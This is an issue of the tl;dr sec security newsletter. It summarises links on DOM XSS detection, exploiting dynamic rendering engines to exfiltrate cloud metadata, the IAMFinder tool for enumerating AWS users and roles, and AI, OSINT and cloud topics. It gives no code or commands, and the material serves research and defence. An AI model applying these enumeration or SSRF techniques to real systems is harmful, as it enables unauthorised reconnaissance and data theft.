• tl;dr sec
  • Posts
  • [tl;dr sec] #62 - Leaking IAM Users and Roles, AI, and Exploiting Dynamic Renderers

[tl;dr sec] #62 - Leaking IAM Users and Roles, AI, and Exploiting Dynamic Renderers

A tool to sneakily enumerate all IAM users and roles in a target AWS account, recent events in AI, and how to attack server-side renderers.

Hey there,

I hope you’ve been doing well! I missed you, dear reader.

A Tryptophan-induced Reflection

Last week I did some reflecting. I have a lot to be thankful for, but I want to mention one thing in particular.

I wanted to share my writing online for a long time, but to be honest, I was scared to do it– don’t other people know more? Isn’t the Internet a Nasty and Mean Place?

But people have been really nice about tl;dr sec! 😱 I’ve been blown away by people’s kind words about how they find it useful, look forward to it, how it made them laugh in a meeting and get in trouble with their boss, and more.

This encouragement has frankly been key to me continuing, when it’s yet again 11:09pm on a Wednesday and I’m wrapping up another issue.

I wanted to share this anecdote because if you’re reading this and have been wanting to share your work- you should!

I know that you have knowledge that other people would love to read.

Write it down. Share it.

We’ll be glad you did.

Speaking Stuff

OWASP Israel - Tues, Dec 8th
I’ll be joining some cool speakers chatting about Kubernetes and XXE.

Empire Hacking - Tues, Dec 8th
After refocusing myself by meditating in a redwood forest, I’ll join Empire Hacking, an awesome meet-up by Trail of Bits.

As they’re also program analysis nerds, they’ve asked me to include more details on Semgrep internals and design decisions, so if you’re curious about how Semgrep works at a deeper level, this one will be good to check out.

Open Security Summit - Fri, Dec 11th
I’ll be giving a Semgrep workshop, where I’ll try something I’ve never done before! I’m going to live tweet Semgrep challenges (match this code, don’t match that code) and let people tweet back their solutions.

Should be fun! Or it may blow up in my face, we’ll see 😅 Keep an eye on @clintgibler if you want to join, hope to see you there!

Sponsor

📢 Secure Your Business-Critical SaaS with AppOmni

AppOmni is the leading provider of SaaS Security Posture Management (SSPM) solution. We provide data access visibility and management and security of SaaS solutions, enabling organizations to secure sensitive data. AppOmni’s technology deeply scans APIs, security controls, and configuration settings to evaluate the current state of SaaS deployments and compare against best practices. With AppOmni, organizations can establish rules for data access, data sharing and third-party applications that will be continuously and automatically validated.

📜 In this newsletter...

🔗 Links:

  • Web Security: Chrome extension to detect DOM XSS by abusing Trusted Types, exploiting dynamic rendering engines

  • AI: DeepMind's protein-folding breakthrough, 5 AI achievements in 2020, GPT-3 overview, A/B test your titles for Hacker News

  • Red Team: Minimal Docker container bundled with security tools

  • Cloud Security: Query your cloud config and metadata like SQL, find exposed S3 objects, an overview of interesting pre:invent announcements, find existing users and IAM roles in arbitrary AWS accounts, back up your G Suite data to AWS

  • Container Security: Scan Helm charts for K8s misconfigurations

  • Politics / Privacy: Maybe economic inequality, minimal social mobility, and more are the historic norm, not recent bad trends

  • OSINT: Search URLs exposed by shortener services, a security tool is accurately represented in court

  • Misc: Remap all git HTTP URLs to SSH, protect domains that don't send email, a proposed service for surfacing great creators

Web Security

filedescriptor/untrusted-types
A Chrome extension by @filedescriptor that abuses Trusted Types to find DOM XSS by logging the stack trace of all sink calls and their changes to the DOM. If this sounds interesting, I highly recommend also checking out Tracy, a browser extension for web app pen testing by my friends Jake Heath and Michael Roberts, which to my knowledge is the best tool to trace user input in and out of web apps.

Exploiting dynamic rendering engines to take control of web apps
Dynamic rendering is a technique some web apps use to serve prerendered web site pages to crawlers (better SEO). r2c’s Vasilii Ermilov describes techniques to exploit common dynamic rendering tools (exfiltrating cloud metadata a la SSRF), how to fingerprint when sites are using dynamic rendering, and more. One of the attack chains described involves a series of nested requests that honestly hurts my brain, but is cool to read.

AI

DeepMind’s protein-folding AI has solved a 50-year-old grand challenge of biology
AlphaFold can predict the shape of proteins to within the width of an atom, which will help scientists design drugs and understand disease. “AlQuraishi thought it would take researchers 10 years to get from AlphaFold’s 2018 results to this year’s. This is close to the physical limit for how accurate you can get, he says.” More from DeepMind’s blog.

Top 5 AI Achievements of 2020
M Umer Mirza describes 5 topics/areas: 1) GPT-3, 2) AI-enabled healthcare and drug discovery, 3) graphics, animation, image and video processing, 4) motion and gestures, and 5) NVIDIA AI’s processing power.

GPT-3 vs. Existing Conversational AI Solutions
An overview of GPT-3, things it can do well (e.g. knowledge retrieval), limitations (inferred knowledge, knowing when it doesn’t know something), examples on why explainability is important in ML, and some pricing info.

A/B Test your Hacker News titles with AI before publishing
Enter two potential titles and it’ll recommend one. By Kimmo Ihanus.

Red Team

higatowa/bento
“A simple and minimal Docker container for penetration testers and CTF players. It has the portability of Docker with the addition of X, so you can also run GUI application (like Burp).” Currently includes: Burp Suite, gobuster, seclist, odat, impacket, sqlmap, sqlplus, mysql-client, openvpn, bytecode-viewer, Ghidra.

Cloud Security

cloudquery/cloudqueryEase monitoring, governance, and security by querying your cloud configuration and metadata as SQL.

nccgroup/s3_objects_checkBy NCC Group’s Xavier Garceau-Aranda: Whitebox evaluation of effective S3 object permissions to identify publicly accessible objects as well as objects accessible for AuthenticatedUsers (by using a secondary profile).

pre:Invent 2020Chris Farris describes 29 of the 279 pre:invent announcements he found interesting, covering AWS Organizations, new security tools, serverless, ElasticSearch, and DynamoDB. Also featuring an excellent banner image 🤣

I’m out of new travel photos, so here is a scene from the back of the Sans Expo in the alternate universe where re:Invent was in-person

In a recent blog, “Information Leakage in AWS Resource-Based Policy APIs,” Unit 42 researchers disclosed a class of AWS APIs that can be abused to find existing users and IAM roles in arbitrary accounts. The root cause of the issue is that the AWS backend validates all resource-based policies and raises alerts if a specified principal does not exist. One can abuse this feature to check whether a user or role exists in a targeted account.

Based on these findings, Unit 42 developed IAMFinder, an open source tool that currently implements APIs of four AWS services: S3, KMS, SQS, and IAM. With only the AWS account number of the targeted account, IAMFinder is able to identify users and roles in that environment.

Setting up personal G Suite backups on AWS
Scott Piper describes how he automates the backup of his Gmail and Google Drive to AWS. Tools referenced:

  • GAM: a CLI tool for Google Workspace (fka G Suite) Administrators to manage domain and user settings quickly and easily

  • got-your-back: a CLI tool for backing up your Gmail messages to your local computer, using Gmail’s API over HTTPS.

  • Rclone: a CLI program to manage files on cloud storage.

Container Security

Scan Helm charts for Kubernetes misconfigurations with CheckovPost by Bridgecrew’s Matt Johnson. Checkov uses helm template to output the resulting Kubernetes manifests and scans those for insecure patterns (e.g. the CIS Kubernetes Benchmarks).

Politics / Privacy

Welcome to the new Middle Ages
This article argues that the recent rise in economic inequality, decline in social mobility, identity-based culture wars in politics, and more are not necessarily current bad trends, but rather, are historical norms.

Today the richest 40 Americans have more wealth than the poorest 185 million Americans. The leading 100 landowners now own 40 million acres of American land, an area the size of New England.

Politics has returned to its pre-modern role of religion. The Internet has often been compared to the printing press, and when printing was introduced it didn’t lead to a world of contemplative philosophy; books of high-minded inquiry were vastly outsold by tracts about evil witches and heretics.

… the post-printing early modern period was the golden age of religious hatred and torture; the major witch hunts occurred in an age of rising literacy, because what people wanted to read about was a lot of the time complete garbage.

OSINT

utkusen/urlhunter
Tool by Utku Şen that enables searching URLs that are exposed via shortener services such as bit.ly and goo.gl. Uses data from URLTeam, who continuously bruteforce URL shortener services and publish their results. If you pay attention closely, you might get a slight feel for how URLTeam feels about shorteners.

Misusing OSINT to claim election fraud
Imagine waking up one day and finding a security tool you built being horribly misused in court 😅 This is basically what happened to OSINT tool Spiderfoot’s author Steve Micallef. In short, someone scanned Dominion Voting’s domain name and used the results to support claims that the voting systems were accessible over the Internet and being controlled by foreign countries like Iran and China. Steve’s post nicely discusses how to cautiously and accurately use OSINT info and debunks a number of the case claims. In short:

Misc

Protect domains that don’t send email
The UK government on how to make sure that domains that do not send email cannot be used for spoofing using SPF, DMARC, and DKIM.

Introducing Amazon Curate (I Wish)
One of the main reasons I started tl;dr sec is that I kept coming across really great work that not enough people had heard of. So I thought this faux AWS product by Daniel Miessler would be pretty awesome, and help address the challenge of surfacing great work done by (currently) relatively unknown creators.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler @tldrsec